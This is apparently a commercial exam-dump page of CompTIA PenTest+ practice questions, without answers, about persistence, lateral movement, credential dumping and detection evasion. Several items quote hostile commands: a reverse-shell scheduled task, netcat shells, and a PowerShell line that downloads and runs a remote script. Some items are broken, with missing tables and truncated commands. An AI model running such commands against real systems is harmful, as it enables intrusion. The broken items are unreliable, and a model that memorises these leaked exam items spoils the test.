Summer Special Discount 60% Offer - Ends in 0d 00h 00m 00s - Coupon code: brite60

ExamsBrite Dumps

CompTIA PenTest+ Exam Question and Answers

CompTIA PenTest+ Exam

Last Update Jul 10, 2025
Total Questions : 233

We are offering FREE PT0-003 CompTIA exam questions. All you do is to just go and sign up. Give your details, prepare PT0-003 free exam questions and then go for complete pool of CompTIA PenTest+ Exam test questions that will help you more.

PT0-003 pdf

PT0-003 PDF

$42  $104.99
PT0-003 Engine

PT0-003 Testing Engine

$50  $124.99
PT0-003 PDF + Engine

PT0-003 PDF + Testing Engine

$66  $164.99
Questions 1

During an assessment, a penetration tester gains access to one of the internal hosts. Given the following command:

schtasks /create /sc onlogon /tn "Windows Update" /tr "cmd.exe /c reverse_shell.exe"

Which of the following is the penetration tester trying to do with this code?

Options:

A.  

Enumerate the scheduled tasks

B.  

Establish persistence

C.  

Deactivate the Windows Update functionality

D.  

Create a binary application for Windows System Updates

Discussion 0
Questions 2

A penetration tester completes a scan and sees the following Nmap output on a host:

Nmap scan report for victim (10.10.10.10)

Host is up (0.0001s latency)

PORT STATE SERVICE

161/udp open snmp

445/tcp open microsoft-ds

3389/tcp open ms-wbt-server

Running Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7::sp0

The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

Options:

A.  

exploit/windows/smb/psexec

B.  

exploit/windows/smb/ms08_067_netapi

C.  

exploit/windows/smb/ms17_010_eternalblue

D.  

auxiliary/scanner/snmp/snmp_login

Discussion 0
Questions 3

A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:

line 1: #!/usr/bin/bash

line 2: DOMAINS_LIST = "/path/to/list.txt"

line 3: while read -r i; do

line 4: nikto -h $i -o scan-$i.txt &

line 5: done

The script does not work as intended. Which of the following should the tester do to fix the script?

Options:

A.  

Change line 2 to {"domain1", "domain2", "domain3", }.

B.  

Change line 3 to while true; read -r i; do.

C.  

Change line 4 to nikto $i | tee scan-$i.txt.

D.  

Change line 5 to done < "$DOMAINS_LIST".

Discussion 0
Questions 4

A penetration tester cannot complete a full vulnerability scan because the client's WAF is blocking communications. During which of the following activities should the penetration tester discuss this issue with the client?

Options:

A.  

Goal reprioritization

B.  

Peer review

C.  

Client acceptance

D.  

Stakeholder alignment

Discussion 0
Questions 5

During a security assessment, a penetration tester wants to compromise user accounts without triggering IDS/IPS detection rules. Which of the following is the most effective way for the tester to accomplish this task?

Options:

A.  

Crack user accounts using compromised hashes.

B.  

Brute force accounts using a dictionary attack.

C.  

Bypass authentication using SQL injection.

D.  

Compromise user accounts using an XSS attack.

Discussion 0
Questions 6

While performing a penetration test, a tester executes the following command:

PS c:\tools> c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.  

Test connectivity using PsExec on the server01 using cmd.exe

B.  

Perform a lateral movement attack using PsExec

C.  

Send the PsExec binary file to the server01 using cmd.exe

D.  

Enable cmd.exe on the server01 through PsExec

Discussion 0
Questions 7

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

Options:

A.  

Badge cloning

B.  

Shoulder surfing

C.  

Tailgating

D.  

Site survey

Discussion 0
Questions 8

During the reconnaissance phase, a penetration tester collected the following information from the DNS records:

A-----> www

A-----> host

TXT --> vpn.comptia.org

SPF---> ip =2.2.2.2

Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

Options:

A.  

MX

B.  

SOA

C.  

DMARC

D.  

CNAME

Discussion 0
Questions 9

Which of the following techniques is the best way to avoid detection by Data Loss Prevention (DLP) tools?

Options:

A.  

Encoding

B.  

Compression

C.  

Encryption

D.  

Obfuscation

Discussion 0
Questions 10

A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?

Options:

A.  

netsh.exe

B.  

certutil.exe

C.  

nc.exe

D.  

cmdkey.exe

Discussion 0
Questions 11

A penetration tester is unable to identify the Wi-Fi SSID on a client’s cell phone.

Which of the following techniques would be most effective to troubleshoot this issue?

Options:

A.  

Sidecar scanning

B.  

Channel scanning

C.  

Stealth scanning

D.  

Static analysis scanning

Discussion 0
Questions 12

A penetration tester gains access to a domain server and wants to enumerate the systems within the domain. Which of the following tools would provide the best oversight of domains?

Options:

A.  

Netcat

B.  

Wireshark

C.  

Nmap

D.  

Responder

Discussion 0
Questions 13

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Discussion 0
Questions 14

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?

Options:

A.  

Clear the Windows event logs.

B.  

Modify the system time.

C.  

Alter the log permissions.

D.  

Reduce the log retention settings.

Discussion 0
Questions 15

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

Options:

A.  

Latches

B.  

Pins

C.  

Shackle

D.  

Plug

Discussion 0
Questions 16

While performing a penetration testing exercise, a tester executes the following command:

bash

Copy code

PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.  

Test connectivity using PSExec on the server01 using CMD.exe.

B.  

Perform a lateral movement attack using PsExec.

C.  

Send the PsExec binary file to the server01 using CMD.exe.

D.  

Enable CM

D.  

exe on the server01 through PsExec.

Discussion 0
Questions 17

A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?

Options:

A.  

SAST

B.  

SBOM

C.  

ICS

D.  

SCA

Discussion 0
Questions 18

A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate is comptia.org. Which of the following should the tester do to accomplish the assessment objective?

Options:

A.  

Perform information-gathering techniques to review internet-facing assets for the company.

B.  

Perform a phishing assessment to try to gain access to more resources and users’ computers.

C.  

Perform a physical security review to identify vulnerabilities that could affect the company.

D.  

Perform a vulnerability assessment over the main domain address provided by the client.

Discussion 0
Questions 19

A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet:

1 import requests

2 import pathlib

3

4 for url in pathlib.Path("urls.txt").read_text().split("\n"):

5 response = requests.get(url)

6 if response.status == 401:

7 print("URL accessible")

Which of the following changes is required?

Options:

A.  

The condition on line 6

B.  

The method on line 5

C.  

The import on line 1

D.  

The delimiter in line 3

Discussion 0
Questions 20

During an assessment, a penetration tester runs the following command:

dnscmd.exe /config /serverlevelplugindll C:\users\necad-TA\Documents\adduser.dll

Which of the following is the penetration tester trying to achieve?

Options:

A.  

DNS enumeration

B.  

Privilege escalation

C.  

Command injection

D.  

A list of available users

Discussion 0
Questions 21

A company wants to perform a BAS (Breach and Attack Simu-lation) to measure the efficiency of the corporate security controls. Which of the following would most likely help the tester with simple command examples?

Options:

A.  

Infection Monkey

B.  

Exploit-DB

C.  

Atomic Red Team

D.  

Mimikatz

Discussion 0
Questions 22

During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?

Options:

A.  

API

B.  

HTTP

C.  

IPA

D.  

ICMP

Discussion 0
Questions 23

During an assessment, a penetration tester obtains access to an internal server and would like to perform further reconnaissance by capturing LLMNR traffic. Which of the following tools should the tester use?

Options:

A.  

Burp Suite

B.  

Netcat

C.  

Responder

D.  

Nmap

Discussion 0
Questions 24

A penetration tester needs to obtain sensitive data from several executives who regularly work while commuting by train. Which of the following methods should the tester use for this task?

Options:

A.  

Shoulder surfing

B.  

Credential harvesting

C.  

Bluetooth spamming

D.  

MFA fatigue

Discussion 0
Questions 25

A penetration tester launches an attack against company employees. The tester clones the company's intranet login page and sends the link via email to all employees.

Which of the following best describes the objective and tool selected by the tester to perform this activity?

Options:

A.  

Gaining remote access using BeEF

B.  

Obtaining the list of email addresses using theHarvester

C.  

Harvesting credentials using SET

D.  

Launching a phishing campaign using GoPhish

Discussion 0
Questions 26

A penetration tester attempts unauthorized entry to the company's server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?

Options:

A.  

Plug spinner

B.  

Bypassing

C.  

Decoding

D.  

Raking

Discussion 0
Questions 27

Which of the following is within the scope of proper handling and is most crucial when working on a penetration testing report?

Options:

A.  

Keeping both video and audio of everything that is done

B.  

Keeping the report to a maximum of 5 to 10 pages in length

C.  

Basing the recommendation on the risk score in the report

D.  

Making the report clear for all objectives with a precise executive summary

Discussion 0
Questions 28

Which of the following describes the process of determining why a vulnerability scanner is not providing results?

Options:

A.  

Root cause analysis

B.  

Secure distribution

C.  

Peer review

D.  

Goal reprioritization

Discussion 0
Questions 29

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Options:

A.  

nslookup mydomain.com » /path/to/results.txt

B.  

crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com

C.  

dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt

D.  

cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com

Discussion 0
Questions 30

During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client's internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results. Which of the following should the tester have done?

Options:

A.  

Rechecked the scanner configuration.

B.  

Performed a discovery scan.

C.  

Used a different scan engine.

D.  

Configured all the TCP ports on the scan.

Discussion 0
Questions 31

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Which of the following targets should the tester select next?

Options:

A.  

fileserver

B.  

hrdatabase

C.  

legaldatabase

D.  

financesite

Discussion 0
Questions 32

During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?

Options:

A.  

Golden Ticket

B.  

Kerberoasting

C.  

DCShadow

D.  

LSASS dumping

Discussion 0
Questions 33

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

Options:

A.  

Segmentation

B.  

Mobile

C.  

External

D.  

Web

Discussion 0
Questions 34

A penetration tester gains shell access to a Windows host. The tester needs to permanently turn off protections in order to install additional payload. Which of the following commands is most appropriate?

Options:

A.  

sc config start=disabled

B.  

sc query state= all

C.  

pskill

D.  

net config

Discussion 0
Questions 35

During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following:

    Weaker password settings than the company standard

    Systems without the company's endpoint security software installed

    Operating systems that were not updated by the patch management system

Which of the following recommendations should the penetration tester provide to address the root issue?

Options:

A.  

Add all systems to the vulnerability management system.

B.  

Implement a configuration management system.

C.  

Deploy an endpoint detection and response system.

D.  

Patch the out-of-date operating systems.

Discussion 0
Questions 36

During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:

html

Copy code

7/aLeRt('pwned')

Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?

Options:

A.  

Arbitrary code execution: the affected computer should be placed on a perimeter network

B.  

SQL injection attack: should be detected and prevented by a web application firewall

C.  

Cross-site request forgery: should be detected and prevented by a firewall

D.  

XSS obfuscated: should be prevented by input sanitization

Discussion 0
Questions 37

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

Options:

A.  

Configuration changes were not reverted.

B.  

A full backup restoration is required for the server.

C.  

The penetration test was not completed on time.

D.  

The penetration tester was locked out of the system.

Discussion 0
Questions 38

During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:

mimikatz # privilege::debug

mimikatz # lsadump::cache

---Output---

lapsUser

27dh9128361tsg2€459210138754ij

---OutputEnd---

Which of the following best describes what the tester plans to do by executing the command?

Options:

A.  

The tester plans to perform the first step to execute a Golden Ticket attack to compromise the Active Directory domain.

B.  

The tester plans to collect application passwords or hashes to compromise confidential information within the local computer.

C.  

The tester plans to use the hash collected to perform lateral movement to other computers using a local administrator hash.

D.  

The tester plans to collect the ticket information from the user to perform a Kerberoasting attack on the domain controller.

Discussion 0
Questions 39

A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access. Which of the following techniques should the tester use?

Options:

A.  

Credential stuffing

B.  

MFA fatigue

C.  

Dictionary attack

D.  

Brute-force attack

Discussion 0
Questions 40

A penetration tester is searching for vulnerabilities or misconfigurations on a container environment. Which of the following tools will the tester most likely use to achieve this objective?

Options:

A.  

Nikto

B.  

Trivy

C.  

Nessus

D.  

Nmap

Discussion 0
Questions 41

During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing. Which of the following tools should the tester use?

Options:

A.  

Mimikatz

B.  

ZAP

C.  

OllyDbg

D.  

SonarQube

Discussion 0
Questions 42

A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings, and high-level statements. Which of the following sections of the report would most likely contain this information?

Options:

A.  

Quality control

B.  

Methodology

C.  

Executive summary

D.  

Risk scoring

Discussion 0
Questions 43

A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following output:

mathematica

Copy code

SeAssignPrimaryTokenPrivilege Disabled

SeIncreaseQuotaPrivilege Disabled

SeChangeNotifyPrivilege Enabled

SeManageVolumePrivilege Enabled

SeImpersonatePrivilege Enabled

SeCreateGlobalPrivilege Enabled

SeIncreaseWorkingSetPrivilege Disabled

Which of the following privileges should the tester use to achieve the goal?

Options:

A.  

SeImpersonatePrivilege

B.  

SeCreateGlobalPrivilege

C.  

SeChangeNotifyPrivilege

D.  

SeManageVolumePrivilege

Discussion 0
Questions 44

After a recent penetration test was conducted by the company's penetration testing team, a systems administrator notices the following in the logs:

2/10/2023 05:50AM C:\users\mgranite\schtasks /query

2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

Which of the following best explains the team's objective?

Options:

A.  

To enumerate current users

B.  

To determine the users' permissions

C.  

To view scheduled processes

D.  

To create persistence in the network

Discussion 0
Questions 45

A previous penetration test report identified a host with vulnerabilities that was

successfully exploited. Management has requested that an internal member of the

security team reassess the host to determine if the vulnerability still exists.

Part 1:

. Analyze the output and select the command to exploit the vulnerable service.

Part 2:

. Analyze the output from each command.

· Select the appropriate set of commands to escalate privileges.

· Identify which remediation steps should be taken.

Options:

Discussion 0
Questions 46

A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?

Options:

A.  

attacker_host$ nmap -sT | nc -n 22

B.  

attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 80 | tee backpipe

C.  

attacker_host$ nc -nlp 8000 | nc -n attacker_host$ nmap -sT 127.0.0.1 8000

D.  

attacker_host$ proxychains nmap -sT

Discussion 0
Questions 47

During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?

Options:

A.  

Burp Suite

B.  

Wireshark

C.  

Zed Attack Proxy

D.  

Metasploit

Discussion 0
Questions 48

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:

PORT STATE SERVICE

22/tcp open ssh

25/tcp filtered smtp

111/tcp open rpcbind

2049/tcp open nfs

Based on the output, which of the following services provides the best target for launching an attack?

Options:

A.  

Database

B.  

Remote access

C.  

Email

D.  

File sharing

Discussion 0
Questions 49

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?

Options:

A.  

Target 1: EPSS Score = 0.6 and CVSS Score = 4

B.  

Target 2: EPSS Score = 0.3 and CVSS Score = 2

C.  

Target 3: EPSS Score = 0.6 and CVSS Score = 1

D.  

Target 4: EPSS Score = 0.4 and CVSS Score = 4.5

Discussion 0
Questions 50

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client's blue team. Which of the following exfiltration methods most likely remain undetected?

Options:

A.  

Cloud storage

B.  

Email

C.  

Domain Name System

D.  

Test storage sites

Discussion 0
Questions 51

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:

findstr /SIM /C:"pass" *.txt *.cfg *.xml

Which of the following is the penetration tester trying to enumerate?

Options:

A.  

Configuration files

B.  

Permissions

C.  

Virtual hosts

D.  

Secrets

Discussion 0
Questions 52

Which of the following technologies is most likely used with badge cloning? (Select two).

Options:

A.  

NFC

B.  

RFID

C.  

Bluetooth

D.  

Modbus

E.  

Zigbee

F.  

CAN bus

Discussion 0
Questions 53

A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?

Options:

A.  

nc -e /bin/sh -lp 53

B.  

/bin/sh -c 'nc -l -p 443'

C.  

nc -e /bin/sh 53

D.  

/bin/sh -c 'nc 443'

Discussion 0
Questions 54

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.  

Trivy

B.  

Nessus

C.  

Grype

D.  

Kube-hunter

Discussion 0
Questions 55

A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?

Options:

A.  

MITRE ATT&CK

B.  

OSSTMM

C.  

CI/CD

D.  

DREAD

Discussion 0
Questions 56

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Hostname | IP address | CVSS 2.0 | EPSS

hrdatabase | 192.168.20.55 | 9.9 | 0.50

financesite | 192.168.15.99 | 8.0 | 0.01

legaldatabase | 192.168.10.2 | 8.2 | 0.60

fileserver | 192.168.125.7 | 7.6 | 0.90

Which of the following targets should the tester select next?

Options:

A.  

fileserver

B.  

hrdatabase

C.  

legaldatabase

D.  

financesite

Discussion 0
Questions 57

A tester gains initial access to a server and needs to enumerate all corporate domain DNS records. Which of the following commands should the tester use?

Options:

A.  

dig +short A AAAA local.domain

B.  

nslookup local.domain

C.  

dig axfr @local.dns.server

D.  

nslookup -server local.dns.server local.domain *

Discussion 0
Questions 58

Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]

If ($1 -eq "administrator") {

echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -}

Which of the following is the penetration tester most likely trying to do?

Options:

A.  

Change the system's wallpaper based on the current user's preferences.

B.  

Capture the administrator's password and transmit it to a remote server.

C.  

Conditionally stage and execute a remote script.

D.  

Log the internet browsing history for a systems administrator.

Discussion 0
Questions 59

A penetration tester sets up a C2 (Command and Control) server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?

Options:

A.  

ProxyChains

B.  

Covenant

C.  

PsExec

D.  

sshuttle

Discussion 0
Questions 60

A penetration tester must identify vulnerabilities within an ICS (Industrial Control System) that is not connected to the internet or enterprise network. Which of the following should the tester utilize to conduct the testing?

Options:

A.  

Channel scanning

B.  

Stealth scans

C.  

Source code analysis

D.  

Manual assessment

Discussion 0
Questions 61

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?

Options:

A.  

Enable monitoring mode using Aircrack-ng.

B.  

Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.

C.  

Run KARMA to break the password.

D.  

Research WiGLE.net for potential nearby client access points.

Discussion 0
Questions 62

During an assessment, a penetration tester runs the following command:

setspn.exe -Q /

Which of the following attacks is the penetration tester preparing for?

Options:

A.  

LDAP injection

B.  

Pass-the-hash

C.  

Kerberoasting

D.  

Dictionary

Discussion 0
Questions 63

During a routine penetration test, the client’s security team observes logging alerts that indicate several ID badges were reprinted after working hours without authorization. Which of the following is the penetration tester most likely trying to do?

Options:

A.  

Obtain long-term, valid access to the facility

B.  

Disrupt the availability of facility access systems

C.  

Change access to the facility for valid users

D.  

Revoke access to the facility for valid users

Discussion 0
Questions 64

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Options:

Discussion 0
Questions 65

A penetration testing team needs to determine whether it is possible to disrupt wireless communications for PCs deployed in the client’s offices. Which of the following techniques should the penetration tester leverage?

Options:

A.  

Port mirroring

B.  

Sidecar scanning

C.  

ARP poisoning

D.  

Channel scanning

Discussion 0
Questions 66

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

Options:

A.  

Browser Exploitation Framework

B.  

Maltego

C.  

Metasploit

D.  

theHarvester

Discussion 0